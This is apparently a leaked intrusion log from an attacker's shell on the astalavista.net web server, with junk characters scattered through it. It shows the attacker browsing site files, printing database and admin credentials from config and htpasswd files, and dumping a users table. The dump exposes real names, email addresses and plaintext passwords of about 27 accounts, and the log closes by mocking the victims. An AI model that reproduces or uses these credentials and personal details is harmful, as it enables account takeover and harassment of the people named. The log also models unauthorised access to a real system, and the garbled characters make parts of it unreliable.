7 H7 l! J6 r/ Y9 b8 C3 y( u+ Vdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth6 \' I  O; h7 A2 y) j" M. K: c
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history! V* `9 y( n8 _" ~' r$ m5 B& }/ C4 E
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
8 L( Q' ?- z" b% ]7 C$ F-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile. L" l+ }. ~, w/ Z7 b; i$ x
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc% _' f0 P5 f8 L7 f! |7 {
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains: [( o) q( J3 e* m
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap* H2 {; D$ e! J9 p8 ^3 E
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail. P. x; \, J9 |! r
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html* ?+ ~  h, g( g/ f/ Y' M
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
2 o- V( D5 T7 g8 _1 F* y
  I0 D! a7 ~3 D% B4 Osh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/; E* c  b. U$ n" S
sh-3.2$ ls -la
9 ~8 O* R$ v; g: z7 s! ]: a( @2 htotal 2001 b% ?  E8 y# J8 d/ n
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
4 T2 w9 i( L5 @+ m0 udrwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..8 N5 y6 h1 r$ {9 T4 t! _' x  B
drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
0 G, t* H  d0 Z, |$ v; v9 d. ydrwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql2 ?) o  \' Y! A$ r* d% j
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
* X2 A5 K$ M& b6 I. A/ qdrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
5 k: @) D" V3 l  P- I& X  w( Adrwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
- e2 Q; }8 t3 j# B4 D" T: v! Y6 k-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
( E1 w4 O+ h" u! ^( f/ w: b) adrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config9 L  e: h! I  d# k
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
! z3 _' j3 K/ ^$ qdrwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
- R% d- |7 R' E& C+ K-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
5 w; g! Q5 Z" S; F-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico
. I# i5 F  R% ]: g/ t0 }drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
6 R5 o  Y$ S/ K6 m. S! L/ ?! P7 |2 Gdrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
+ q& \8 V7 t6 O6 X3 u" G9 J-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess! U; P) J2 ^* [( z7 Q; R/ V( C* }
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess1 ]+ E  ~# p: ?" ~
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php7 K1 d5 j# u. _
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html6 {. K/ z" t( z' {3 v2 y9 `
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
3 V( n" g0 H  h$ C0 C-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php
$ _% O$ |+ f; O& _; y3 R-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf% k: B. k$ p8 m& ^
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
9 w! v- X9 l  b" F( t' Fdrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang4 T( Y: Q2 A7 L- N4 E6 f
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib' V. s* y! I+ \& _# D: X' J
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
1 z% T4 E" Q, V0 o# pdrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
4 {3 @+ l1 b6 cdrwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
* T8 L' F; v/ u# o7 D/ `! d( ?drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new( O9 F$ n+ {9 c- i, n
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf. _/ ]6 X9 H. r
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re  g/ K0 N4 a1 d+ D, ?
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt5 z! N4 B$ ^3 |; A
drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss* \$ @- y) e8 ~, |' `! g
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources, v1 ?! e1 [- o( a( j
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com, e; ?1 V. m, {( I* a. ~6 M7 ~
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes0 D/ }; P. G; K0 f6 V0 v1 J
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
% X, A4 Z+ N9 F1 ^drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl3 F4 @9 n. h/ C" m9 b
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
- M9 i9 Y6 Z' mdrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old' l8 S2 r5 c/ }: R2 k* b
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
" n& i7 ^, A, Z3 _  _drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
* e1 ~' ~$ b( N) g0 B, l: x( x# z1 q7 O
sh-3.2$ head -20 index.php
0 a* A" E1 W" E& @5 x( H8 D5 U<?PHP& r: K$ E. I7 {; Z
/**9 l* [" _" {, H3 U* h1 ]7 ^# T* Y
* Mainfile (external) for astalavistaNET v2.07 n9 O; m  G+ r7 S$ \( p
*! A: d3 S7 {9 z
* @copyright     Astalavista IT Engineering GmbH
0 V. h# |! s5 `! L5 X: y, q* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>. n1 V2 G* a4 i' v2 N
* @version       1.0
* B+ W0 c5 m6 I+ ?7 I* A*/
/ w5 q# f2 h8 T0 t/ b. r1 J+ u# m: y9 M1 P( W0 B  G% C
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
( ]. y" |; V" [1 O; u3 H0 d5 P- I- f' y                $dontStartSession = false;9 g4 {* `$ F9 H, B& A! M8 A
        } else {4 K7 L5 z2 G$ y. T  G7 q6 a
                $dontStartSession = true;2 ?# ?$ g# y# K& A/ x& V2 c
        }
; p9 c7 F6 Q! Z' {8 |        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
0 t+ r2 U8 c+ n* ~2 Y( [8 v        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
& r* I% Y2 U- ]+ a3 Z        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
* Q4 l# _* Q, `; J$ N3 V. G        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);7 w( T6 }; j& \) r: H
6 f+ D2 T9 D2 ]! W7 u2 ~
sh-3.2$ cd config: a' e/ n0 B3 g+ b
sh-3.2$ ls -la
" Q* z) L2 t0 a# B+ P- Y7 ~total 325 \7 D2 L4 l6 p3 h! c
drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
* h7 G4 D3 Z" hdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
- {# t" _. q; o0 g1 n! j-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php6 G4 O4 _+ M7 {' I; W& c
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
- Y1 w2 [0 |. N  {& j-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
3 H: R4 C, U1 e' v6 l7 O-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php- z0 p  z$ u7 c8 P3 P4 a/ X( p
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
3 I7 c' m$ H1 d' U, P) g. c
9 S  m: x8 n0 s2 \5 \2 t( Ish-3.2$ cat com.conf.php
+ y% t. v' C1 n+ \4 X" j6 T* k, B* p[snip]# l+ y' w% I) y9 K2 z) v
//member-database4 r. F+ `' s% p+ M+ L
$_CONFIG['db_mem_server']       = ‘localhost’;
: R, }# L* ^1 Z3 N( G1 C$ z$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
# W3 {1 \; y/ S/ G' U& Y" [$_CONFIG['db_mem_user']         = ‘astanet_db’;
+ j/ a. q$ j# l! q, c' O$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;! h) B% v3 P7 E& L
$_CONFIG['db_mem_debug']        = false; //true or false
* W$ I5 o+ a3 c- x8 Q# O//ads-database. G9 G. S( N2 d# p# ^: s4 @6 s9 f
$_CONFIG['db_ads_server']       = ‘localhost’;* C' f+ Q8 b3 b1 n3 y5 W! a. g
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
- P. k- `% B  Q6 [! l: k" K$_CONFIG['db_ads_user']         = ‘astanet_db’;
! u# O- P/ x- J0 q  X$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;2 w! d6 p  I+ y
$_CONFIG['db_ads_debug']        = false; //true or false
) i5 h. D8 M4 R//rainbow-database+ j2 M  Z+ t  w" t# X) ]0 l
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;
, s/ X2 Q; Z) s- s- E$ @' ~2 q, U5 ]$_CONFIG['db_rainbow_database'] = ‘rainbow’;
3 c  H, {  n/ M8 G0 q: F) B$_CONFIG['db_rainbow_user']     = ‘dinu’;/ O  T+ l3 N! G5 d6 N' f/ X
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
: l1 ^; |0 C$ j! o" A+ g4 |$_CONFIG['db_rainbow_debug']    = false; //true or false
6 I# {4 ^2 }, L6 s. R7 k//mailing lists database' U6 F. f$ q) q8 v, ?9 z* n; L
$_CONFIG['db_mailing_lists_server']     = ‘localhost’;
) ?+ E8 B% F4 i5 w+ U( e$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;' g1 A$ o7 y5 R$ n( I% N2 ?
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;
& Q7 O7 j6 W  d% L4 e$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;5 i- W; {' D+ h' p" B3 W
$_CONFIG['db_mailing_lists_debug']              = false; //true or false
' C, @, G/ i. b, L" @/ u7 S8 s//paypal. _1 p) u! O. K/ F5 T" _
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
8 x2 d1 ~- I* a6 ^7 N; u$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
, x* X' {. C: N/ h; B$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
( x$ x3 {- Y$ u/ V' S2 g4 Q$_CONFIG['sub_pp_noship']       = ‘1′;
4 j- X( r. [% o$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
1 d9 ~& w1 a" n/ D9 S, ][snip]
  C6 h% I9 V6 h( n0 k5 s/ G; {# ^8 r8 l: g) S
sh-3.2$ cd ..
& K0 N8 f1 k! x% H% h/ {# Tsh-3.2$ cd member/ g  L3 v& y2 @5 p! s/ t
sh-3.2$ ls -la
+ e% M$ n& p: Q& k6 ~) Ctotal 20# {" j+ P7 ?3 |$ g# x  T
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 ./ J+ a/ h# Q; g2 ]- }
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..; ^; Y8 ?5 \2 M: t8 @4 ~: A4 g
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
- @( T# }! E( Q1 K  H5 I' ~-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
+ c' t" e" b& _* jsh-3.2$ cat .htaccess
4 k- Y7 k! o5 m2 a# w1 A: S& B$ xSecFilterEngine off
. B5 u, X. P6 N4 [
$ F3 F- Y0 P1 E' x- zsh-3.2$ cd ..7 `' E7 D& @7 Z/ f
sh-3.2$ cd cron
8 s2 d8 E) E  B3 O* Esh-3.2$ ls -la4 u. q" ?( a) U/ J0 j% w& c( k
total 168
  W: H% h. x4 \" mdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
3 i0 |7 ~5 k4 v' I' Adrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..% N5 c% W' m4 D; W2 O
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php0 d% V) L; P0 T# \* D
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php2 [& [4 Z2 H' y! o) c4 m
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php' H* _1 ^( m& y! c
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
6 Q8 d8 t0 p" L6 D2 q" U-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php0 s- E- ]7 T9 H2 ~! L6 C# _8 y
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
0 F: G8 W1 K. ?6 s. Z9 ~, Q1 ]1 s-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
% ^8 v6 m" q8 d6 a-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php9 [- _/ o, E) b4 D/ k
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh; ~4 g! I# w0 k' `  J; {9 t  j
-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php5 O$ |( k) k& I- W! F2 I
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
6 f2 Q( x1 ~8 [3 ?- [-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
% Z- s: R  n7 Q6 Y: }: H-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
  s8 W7 V( q- R% C% I' J-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
* n5 F9 b6 \* X% R; z6 U-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
6 j$ T7 d, K4 |. p) h& a( ~4 W-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
$ t0 _% C: e1 F% H: Y5 ?& ?$ W-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php  l- J( S& N% ?0 W* g
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php9 }9 Z& _1 L+ k5 B
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email9 V% E* D* @  ]
-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php! i4 Y% G6 m/ l7 O( a
-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
1 G" H5 r7 p  H9 Q  y( i# f4 t/ v( ?: A% \; d, x
sh-3.2$ cd ..
  M* L/ W0 T& f1 q+ c: fsh-3.2$ cd _0075 H. n) E9 L9 Z4 F
sh-3.2$ ls -la: v, b  v  C3 N; M
total 24* W* F. j/ e$ ~: H& Q5 l2 G
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .& ?. r1 c) B- d- i2 s: x1 G/ a/ q
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
3 o2 R: b0 u& Y, v* ~-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
" i3 n( n+ q8 p7 i: ]6 h-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php5 [# |8 A+ p$ h' z) w2 |8 g) w: a
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
* f$ O6 N& x5 ~8 a; v2 kdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
, M) e: E8 L2 N1 I
+ o* l3 q+ e- w4 W1 p8 Z4 gsh-3.2$ cat  .htaccess# c/ U) h- n3 {1 H$ Y: B' y1 k
authType Basic
1 c0 f7 \+ z5 r4 y" JauthName Admin
' b% W9 k1 }- {  Q/ oauthUserFile /home/astanet/auth/.htadm_pwd: J9 y' ^) c" Q1 G
require valid-user' o( G: [% M" L7 p

( Q  ^, }/ K+ ^1 o& R9 ]2 I- jsh-3.2$ cat /home/astanet/auth/.htadm_pwd  Y( @" U8 l# x6 I/ b; A# N! x) x
admin2net:CR0bl65MwhfT0 h% j0 Q! y4 f8 A  g# I: N, e
- R- H; W' Q7 e
sh-3.2$ mysql -u astanet_db -p
$ x1 x, `  R4 V2 mEnter password:" |4 `6 |% p! V
Welcome to the MySQL monitor.  Commands end with ; or \g.: f: t2 H, l5 r0 w+ _- H& a
Your MySQL connection id is 275153
" s! H" |- }, e9 W8 uServer version: 5.0.45-community-log MySQL Community Edition (GPL)! ^& h' {1 J- a- x8 V7 q( P5 H" c

( u# C) m' P- X( `; a5 nType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# h( l/ H( L$ M9 {
1 J8 i$ x3 n* C0 p. n$ J
mysql> show databases;
) p0 F4 O) g- f+———————–+
3 t- u9 u8 w5 |  o* F| Database              |3 \& T# ~9 N. |: Z1 M
+———————–+
. N% I" a; X* }| information_schema    |
- o1 n9 E- I  X3 S| astanet_ads           |
8 W7 _  ]8 t: g9 `7 Y| astanet_mailing_lists |0 r8 @* m, M! y. i. w1 S
| astanet_mediawiki     |, W2 i  \4 ]5 d9 y2 k" c* w
| astanet_membersystem  |8 l1 N0 F& [- x* J/ [
| test                  |
5 }/ p8 k. [5 y$ Y+———————–+
! D4 C+ m( R: U5 |+ v' L5 T6 rows in set (0.00 sec)
0 a3 i0 R% t- N$ O
, C: c6 R! b& M3 i2 c* K( j4 Umysql> use astanet_membersystem% h1 p" f, n: E$ J
Database changed8 W( A* I/ s8 ^7 U! S0 V& t  j
mysql> show tables;8 Y5 d. G  d3 n+ _
+———————————–+
9 z+ \2 P; U: J; l% W7 f# `4 Q( \| Tables_in_astanet_membersystem    |5 P) V+ x' A% d1 `- t: @
+———————————–+
! o: A( M# A' d5 Q| blacklist_categories              |
% ~+ n4 w. X  E: E+ n: }* }! p5 T| blacklist_content                 |  y1 n$ w1 t3 N5 m- S. s2 {
| blacklist_levels                  |
1 E  }  H+ }2 }# S# u; g7 v| blacklist_mcset                   |
0 {( X  x0 E/ }! ~: Z| dir_categories                    |% E; I% x  n7 E4 T; e* J) l
| dir_comments                      |
/ T( z( q: k) w0 P& C- R| dir_links                         |6 p2 c9 E5 U) K; O. s1 v, x, l) c
| dir_temp                          |
0 d- Y8 ?* o# X, ?! X| dir_votes                         |
$ }' L1 M3 A8 S5 o| documents                         |1 g% e: B  ]* I' t
| documents_categories              |- O) b; s6 J8 R5 W2 b7 @5 B
| email_content                     |7 N5 F" o+ a  p
| email_settings                    |
+ j$ @7 |+ h$ M6 O- || exploits                          |
+ T: u, [# w/ N| exploits_categories               |
% v+ K7 m; A7 h% }. C4 `| exploittree_categories            |" w) L. ?0 n1 y/ O  c( z* ~
| exploittree_exploits              |
0 m3 H5 V/ @4 x4 k0 l. n| home_values                       |9 y7 T6 I- o; Y* p. _
| iso_countries                     |  M# T* _; ~8 a$ i9 W1 |
| links_categories                  |4 a7 e, [5 V: f
| links_records                     |0 v7 N8 a; U& F# v! [3 l# s" b
| links_unauth                      |
2 m+ {+ [- Z0 a. Z) C7 X| links_votes                       |
, B2 V/ W1 [+ @( T- P# K4 y| log                               |0 @$ d' J7 b% s2 l0 |
| news_categories                   |% n8 n/ b1 w  K' M4 S$ G; C! n9 @
| news_comments                     |
: Q6 Y4 N. ^# w( E) L0 H* o| news_emoticons                    |0 ^; [  j3 w& Q  V  w
| news_latest                       |% P, P. m0 s8 y$ D, k" k
| news_messages                     |
- P  q* L1 b( M1 W| news_statistics                   |) I' d& q5 E" C
| news_votes                        |8 Z* X0 [* M2 S* F. C; C% H+ Q. E
| prices_content                    |
- x  {) m8 `' \% m# I| prices_offers                     |
- Z* O3 Z+ D5 Q+ p/ X4 a| rss_settings                      |: v( D3 E9 w  X' ]9 e) j  Q
| sessions                          |
0 `3 L! M" ]3 X, ^# t0 I| stats_signups                     |
# j; y9 s% I' W| u2u2                              |7 X; {0 y5 F( S
| u2u_contact                       |: S- ^% j& i# u; F% i
| u2u_settings                      |0 E( b/ w1 }3 U
| user_keywords_selected_categories |
& g9 f* l- q' L0 \1 m" p" j* `! I| users                             |$ R0 M3 g+ o) o& }' C5 p
| users_ipn_test                    |9 i- [! h0 X# z# N+ C& C
| users_keyword_values              |9 s! b2 P7 X8 z8 ?( E) Q
| users_profile                     |" B  O7 r% `4 t8 G3 R/ q+ f
| users_temp                        |
$ N6 N$ E+ }, @# g9 z% j8 K1 O" o* D8 m| users_upgrade                     |
- H% Q: @1 Z  P( d: x+———————————–+! d0 Y* ~- d7 K  j1 U
46 rows in set (0.00 sec)3 q1 {8 Y) W. |+ Z7 \( @

+ x, z9 e$ w, r; E( E  ~1 d1 Zmysql> describe users;
  N# {; ~' ~/ k5 y4 y4 |+————————–+————————————–+——+—–+———————+—————-+7 x0 K8 @; v9 I6 g1 C8 c& i
| Field                    | Type                                 | Null | Key | Default             | Extra          |5 [1 p8 V, y" x: z- c0 n4 |* g% t& c
+————————–+————————————–+——+—–+———————+—————-+
1 I- `% s  t: s. O2 j| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |$ i1 I2 P, s" S% ?- D
| user                     | varchar(50)                          | NO   |     |                     |                |2 _1 Y# g  f% M2 j$ F* Z4 J( a6 Q; W
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |" L" b) r5 K% T9 V7 p
| password                 | varchar(30)                          | NO   |     |                     |                |( o: }+ d/ A5 K- \! f$ {6 j
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
  F( e4 X' X5 y| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
5 J; d2 |% M: n" S) O/ N% U* J| email                    | varchar(50)                          | NO   |     |                     |                |
  q! h4 L# {- i% @| ip                       | varchar(15)                          | NO   |     | 0                   |                |
- O: l$ V' j# G+ Q| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
0 I# z- G! j- C8 a, ^* G| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |& }2 i" w9 C, Z' d5 ?* q
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |4 D4 y+ \, x3 d5 w
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
3 C, R+ y2 W0 M+ O& ]8 U| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
. r1 x7 _3 U" L/ M9 f| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |/ p. ]( j, R) P6 ]; G5 d
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |- N: o& i% g1 O
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |8 a! w4 ^/ W, _
| lang                     | tinytext                             | NO   |     |                     |                |7 T) v6 R+ s5 a7 J7 E
| adid                     | smallint(6)                          | NO   |     | 0                   |                |/ |3 x1 [% I1 \, j+ G' n; H1 r& y4 ]
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
' D& e$ q% v1 V8 H2 c! x| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
8 U" r4 e# K  ~& t' @| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |) {- x# H* U" N# T
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |9 X% r; T: B. y$ z8 g% g
+————————–+————————————–+——+—–+———————+—————-+
  s) N7 x$ R+ Q* W4 J4 w& Q22 rows in set (0.01 sec)
2 G& [0 ^; N2 O
& m' z. Z4 y1 Q8 fmysql> select count(*) as skids from users;
9 ^2 ^, E7 {1 i+——-+0 C( l/ H. U5 T3 s1 l/ B6 Y
| skids |: m! _! L: {3 J2 D
+——-+
! Q0 R- ]2 U. P# V% K| 25199 |
( ?- K* O# ]; `3 d- T+——-+
8 [' H( [2 ?* u3 U' H5 r1 row in set (0.00 sec)0 \3 A. ~1 l  P  M

$ V$ I" |  Q+ |& Q7 M7 Imysql> select user,nickname,password,email from users where userlevel = 1;
6 Z' s' G/ T9 e# |3 X! Q! z! e+————————–+———————-+——————+———————————–+1 a, q# e4 Q9 V
| user                     | nickname             | password         | email                             |
( A# n8 J4 O2 L" l. {7 r$ z+————————–+———————-+——————+———————————–+& g" r9 G, D5 o# T
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
: {1 J* @0 Z5 a3 b" T: Y* J| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |/ O. N4 C! J% ^; J1 U
| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
- a) o1 S% P& J: n$ @| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |8 D& a  F- j; H% Q
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
* k2 X) z# e6 j# Q# M, Z| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |4 L; V4 m0 r3 s8 `
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |6 J+ x0 N% z9 O6 i+ o! E2 H* c! c
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |$ w& ?4 ]9 l2 C0 J$ v4 e1 h
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |6 V# x# j, a% {5 y
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |' c' h) E1 f$ G' {$ _
| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |, r! a* |, R5 c( ~/ h* j
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |
# e+ |/ t% b0 T1 N4 e# d| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
8 i1 D" X2 Z3 ?: X% F! \| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |
2 s, G( h( L/ ^9 k1 ~% }| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
. x/ F0 p* ]7 [2 T) b* T( h| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
/ t9 |5 A0 u+ `  || Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |( Q( `* A) Q* R
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |/ h) ]: U9 Z4 \! U
| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |; t  K) v% w0 R
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |
: @3 C/ t/ ]6 D/ k1 e$ B| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |0 `# G+ e3 ^6 t# a1 s- l8 X9 B+ ]
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
8 \8 ^- V8 F2 [/ q& ?* @| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |$ J0 a( L5 b( M/ `& R1 F
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
9 z+ J: r9 X2 o6 Q, Z5 ]| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |
: }8 m: T- g* i$ a- v| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |( [' L: F; g- e5 B
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
; K7 R* T3 M6 z+————————–+———————-+——————+———————————–+* @5 e+ j$ u. Z  x
27 rows in set (0.00 sec)5 C" f8 Q$ S/ x/ O( L
9 n" i! C8 d. H
mysql> exit;; a8 Q- R3 Q( C) V2 Q! E
Bye
' Q: a3 N. c. X5 u8 j1 c) P% A  F% F7 ], A) k
[~] plaintext passwords? yes," K; d! d* M- s$ j
Those so called “security professionals” who charge you $6.66 / month to
& O: U2 @( e; L/ Mregister at their hack-proof portal, save your passwords in plaintext…
. p; L* U8 i7 `% t& Ebrilliant!
* C0 |0 \; @! a
& ?- s- O2 ~" F9 s[~] This been fun but we want more.
5 h0 e7 N/ P& S. ]- k$ w; A7 o5 k; P. `5 |, k. V* L/ M; {+ g$ u
sh-3.2$ uname -a
% H3 ^  L$ O  x( M& e7 CLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux0 ]: ~; U1 D; L& }
